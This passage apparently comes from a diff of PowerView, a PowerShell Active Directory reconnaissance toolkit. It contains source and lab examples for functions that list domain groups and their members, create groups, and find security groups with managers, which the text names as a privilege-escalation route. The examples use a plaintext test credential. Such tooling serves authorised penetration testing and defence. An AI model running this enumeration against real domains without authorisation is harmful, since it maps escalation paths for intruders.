Desktop Admins +whenchanged : 8/10/2016 12:30:30 AM +objectsid : S-1-5-21-890171859-3433809279-3366196753-1118 +objectclass : {top, group} +cn : Desktop Admins +usnchanged : 13255 +dscorepropagationdata : 1/1/1601 12:00:00 AM +name : Desktop Admins +distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +whencreated : 8/10/2016 12:29:43 AM +instancetype : 4 +objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71 +objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroup -Credential $Cred + +.EXAMPLE + +Get-Domain | Select-Object -Expand name +testlab.local + +'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainGroup] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainGroup] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins))) + +distinguishedname +----------------- +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +.OUTPUTS + +PowerView.Group + +Custom PSObject with translated group property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.Group')] + [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [Alias('UserName')] + [String] + $MemberIdentity, + + [Switch] + $AdminCount, + + [ValidateSet('DomainLocal', 'NotDomainLocal', 'Global', 'NotGlobal', 'Universal', 'NotUniversal')] + [Alias('Scope')] + [String] + $GroupScope, + + [ValidateSet('Security', 'Distribution', 'CreatedBySystem', 'NotCreatedBySystem')] + [String] + $GroupProperty, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $GroupSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($GroupSearcher) { + if ($PSBoundParameters['MemberIdentity']) { + + if ($SearcherArguments['Properties']) { + $OldProperties = $SearcherArguments['Properties'] + } + + $SearcherArguments['Identity'] = $MemberIdentity + $SearcherArguments['Raw'] = $True + + Get-DomainObject @SearcherArguments | ForEach-Object { + # convert the user/group to a directory entry + $ObjectDirectoryEntry = $_.GetDirectoryEntry() + + # cause the cache to calculate the token groups for the user/group + $ObjectDirectoryEntry.RefreshCache('tokenGroups') + + $ObjectDirectoryEntry.TokenGroups | ForEach-Object { + # convert the token group sid + $GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value + + # ignore the built in groups + if ($GroupSid -notmatch '^S-1-5-32-.*') { + $SearcherArguments['Identity'] = $GroupSid + $SearcherArguments['Raw'] = $False + if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties } + $Group = Get-DomainObject @SearcherArguments + if ($Group) { + $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group') + $Group + } + } + } + } + } + else { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainGroup] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $GroupSearcher = Get-DomainSearcher @SearcherArguments + if (-not $GroupSearcher) { + Write-Warning "[Get-DomainGroup] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if ($ConvertedIdentityInstance) { + $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $GroupName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$GroupName)" + $SearcherArguments['Domain'] = $GroupDomain + Write-Verbose "[Get-DomainGroup] Extracted domain '$GroupDomain' from '$IdentityInstance'" + $GroupSearcher = Get-DomainSearcher @SearcherArguments + } + } + else { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance))" + } + } + + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['AdminCount']) { + Write-Verbose '[Get-DomainGroup] Searching for adminCount=1' + $Filter += '(admincount=1)' + } + if ($PSBoundParameters['GroupScope']) { + $GroupScopeValue = $PSBoundParameters['GroupScope'] + $Filter = Switch ($GroupScopeValue) { + 'DomainLocal' { '(groupType:1.2.840.113556.1.4.803:=4)' } + 'NotDomainLocal' { '(!(groupType:1.2.840.113556.1.4.803:=4))' } + 'Global' { '(groupType:1.2.840.113556.1.4.803:=2)' } + 'NotGlobal' { '(!(groupType:1.2.840.113556.1.4.803:=2))' } + 'Universal' { '(groupType:1.2.840.113556.1.4.803:=8)' } + 'NotUniversal' { '(!(groupType:1.2.840.113556.1.4.803:=8))' } + } + Write-Verbose "[Get-DomainGroup] Searching for group scope '$GroupScopeValue'" + } + if ($PSBoundParameters['GroupProperty']) { + $GroupPropertyValue = $PSBoundParameters['GroupProperty'] + $Filter = Switch ($GroupPropertyValue) { + 'Security' { '(groupType:1.2.840.113556.1.4.803:=2147483648)' } + 'Distribution' { '(!(groupType:1.2.840.113556.1.4.803:=2147483648))' } + 'CreatedBySystem' { '(groupType:1.2.840.113556.1.4.803:=1)' } + 'NotCreatedBySystem' { '(!(groupType:1.2.840.113556.1.4.803:=1))' } + } + Write-Verbose "[Get-DomainGroup] Searching for group property '$GroupPropertyValue'" + } + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainGroup] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $GroupSearcher.filter = "(&(objectCategory=group)$Filter)" + Write-Verbose "[Get-DomainGroup] filter string: $($GroupSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $GroupSearcher.FindOne() } + else { $Results = $GroupSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Group = $_ + } + else { + $Group = Convert-LDAPProperty -Properties $_.Properties + } + $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group') + $Group + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGroup] Error disposing of the Results object" + } + } + $GroupSearcher.dispose() + } + } + } +} + + +function New-DomainGroup { +<# +.SYNOPSIS + +Creates a new domain group (assuming appropriate permissions) and returns the group object. + +TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.GroupPrincipal with the specified +group properties. + +.PARAMETER SamAccountName + +Specifies the Security Account Manager (SAM) account name of the group to create. +Maximum of 256 characters. Mandatory. + +.PARAMETER Name + +Specifies the name of the group to create. If not provided, defaults to SamAccountName. + +.PARAMETER DisplayName + +Specifies the display name of the group to create. If not provided, defaults to SamAccountName. + +.PARAMETER Description + +Specifies the description of the group to create. + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' + +Creates the 'TestGroup' group with the specified description. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred + +Creates the 'TestGroup' group with the specified description using the specified alternate credentials. + +.OUTPUTS + +DirectoryServices.AccountManagement.GroupPrincipal +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.GroupPrincipal')] + Param( + [Parameter(Mandatory = $True)] + [ValidateLength(0, 256)] + [String] + $SamAccountName, + + [ValidateNotNullOrEmpty()] + [String] + $Name, + + [ValidateNotNullOrEmpty()] + [String] + $DisplayName, + + [ValidateNotNullOrEmpty()] + [String] + $Description, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $ContextArguments = @{ + 'Identity' = $SamAccountName + } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments + + if ($Context) { + $Group = New-Object -TypeName System.DirectoryServices.AccountManagement.GroupPrincipal -ArgumentList ($Context.Context) + + # set all the appropriate group parameters + $Group.SamAccountName = $Context.Identity + + if ($PSBoundParameters['Name']) { + $Group.Name = $Name + } + else { + $Group.Name = $Context.Identity + } + if ($PSBoundParameters['DisplayName']) { + $Group.DisplayName = $DisplayName + } + else { + $Group.DisplayName = $Context.Identity + } + + if ($PSBoundParameters['Description']) { + $Group.Description = $Description + } + + Write-Verbose "[New-DomainGroup] Attempting to create group '$SamAccountName'" + try { + $Null = $Group.Save() + Write-Verbose "[New-DomainGroup] Group '$SamAccountName' successfully created" + $Group + } + catch { + Write-Warning "[New-DomainGroup] Error creating group '$SamAccountName' : $_" + } + } +} + + +function Get-DomainManagedSecurityGroup { +<# +.SYNOPSIS + +Returns all security groups in the current (or target) domain that have a manager set. + +Author: Stuart Morgan (@ukstufus) , Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl + +.DESCRIPTION + +Authority to manipulate the group membership of AD security groups and distribution groups +can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically +used to delegate management authority to distribution groups, but Windows supports security groups +being managed in the same way. + +This function searches for AD groups which have a group manager set, and determines whether that +user can manipulate group membership. This could be a useful method of horizontal privilege +escalation, especially if the manager can manipulate the membership of a privileged group. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv + +Store a list of all security groups with managers in group-managers.csv + +.OUTPUTS + +PowerView.ManagedSecurityGroup + +A custom PSObject describing the managed security group. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ManagedSecurityGroup')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{ + 'LDAPFilter' = '(&(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))' + 'Properties' = 'distinguishedName,managedBy,samaccounttype,samaccountname' + } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Domain']) { + $SearcherArguments['Domain'] = $Domain + $TargetDomain = $Domain + } + else { + $TargetDomain = $Env:USERDNSDOMAIN + } + + # go through the list of security groups on the domain and identify those who have a manager + Get-DomainGroup @SearcherArguments | ForEach-Object { + $SearcherArguments['Properties'] = 'distinguishedname,name,samaccounttype,samaccountname,objectsid' + $SearcherArguments['Identity'] = $_.managedBy + $Null = $SearcherArguments.Remove('LDAPFilter') + + # $SearcherArguments + # retrieve the object that the managedBy DN refers to + $GroupManager = Get-DomainObject @SearcherArguments + # Write-Host "GroupManager: $GroupManager" + $ManagedGroup = New-Object PSObject + $ManagedGroup | Add-Member Noteproperty 'GroupName' $_.samaccountname + $ManagedGroup | Add-Member Noteproperty 'GroupDistinguishedName' $_.distinguishedname + $ManagedGroup | Add-Member Noteproperty 'ManagerName' $GroupManager.samaccountname + $ManagedGroup | Add-Member Noteproperty 'ManagerDistinguishedName' $GroupManager.distinguishedName + + # determine whether the manager is a user or a group + if ($GroupManager.samaccounttype -eq 0x10000000) { + $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'Group' + } + elseif ($GroupManager.samaccounttype -eq 0x30000000) { + $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'User' + } + + $ACLArguments = @{ + 'Identity' = $_.distinguishedname + 'RightsFilter' = 'WriteMembers' + } + if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential } + + # # TODO: correct! + # # find the ACLs that relate to the ability to write to the group + # $xacl = Get-DomainObjectAcl @ACLArguments -Verbose + # # $ACLArguments + # # double-check that the manager + # if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AceType -eq 'AccessAllowed' -and ($xacl.ObjectSid -eq $GroupManager.objectsid)) { + # $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $True + # } + # else { + # $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $False + # } + + $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' 'UNKNOWN' + + $ManagedGroup.PSObject.TypeNames.Insert(0, 'PowerView.ManagedSecurityGroup') + $ManagedGroup + } + } +} + + +function Get-DomainGroupMember { +<# +.SYNOPSIS + +Return the members of a specific domain group. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for the specified +group matching the criteria. Each result is then rebound and the full user +or group object is returned. + +.PARAMETER Identity + +A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER Recurse + +Switch. If the group member is a group, recursively try to query its members as well. + +.PARAMETER RecurseUsingMatchingRule + +Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse. +Much faster than manual recursion, but doesn't reveal cross-domain groups, +and only returns user accounts (no nested group objects themselves). + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainGroupMember "Desktop Admins" + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +.EXAMPLE + +'Desktop Admins' | Get-DomainGroupMember -Recurse + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Testing Group +GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +.EXAMPLE + +Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +.EXAMPLE + +Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember + +.EXAMPLE + +'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins' + +.EXAMPLE + +Get-Domain | Select-Object -Expand name +testlab.local + +'dev\domain admins' | Get-DomainGroupMember -Verbose +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainGroupMember] Extracted domain 'dev.testlab.local' from 'dev\domain admins' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins))) +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local))) + +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : user1 +MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108 + +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local))) +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : Administrator +MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-339048670-1233568108-4141518690-500 + +.OUTPUTS + +PowerView.GroupMember + +Custom PSObject with translated group member property fields. + +.LINK + +http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.GroupMember')] + [CmdletBinding(DefaultParameterSetName = 'None')] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Parameter(ParameterSetName = 'ManualRecurse')] + [Switch] + $Recurse, + + [Parameter(ParameterSetName = 'RecurseUsingMatchingRule')] + [Switch] + $RecurseUsingMatchingRule, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'member,samaccountname,distinguishedname' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $ADNameArguments = @{} + if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential } + } + + PROCESS { + $GroupSearcher = Get-DomainSearcher @SearcherArguments + if ($GroupSearcher) { + if ($PSBoundParameters['RecurseUsingMatchingRule']) { + $SearcherArguments['Identity'] = $Identity + $SearcherArguments['Raw'] = $True + $Group = Get-DomainGroup @SearcherArguments + + if (-not $Group) { + Write-Warning "[Get-DomainGroupMember] Error searching for group with identity: $Identity" + } + else { + $GroupFoundName = $Group.properties.item('samaccountname')[0] + $GroupFoundDN = $Group.properties.item('distinguishedname')[0] + + if ($PSBoundParameters['Domain']) { + $GroupFoundDomain = $Domain + } + else { + # if a domain isn't passed, try to extract it from the found group distinguished name + if ($GroupFoundDN) { + $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + } + } + Write-Verbose "[Get-DomainGroupMember] Using LDAP matching rule to recurse on '$GroupFoundDN', 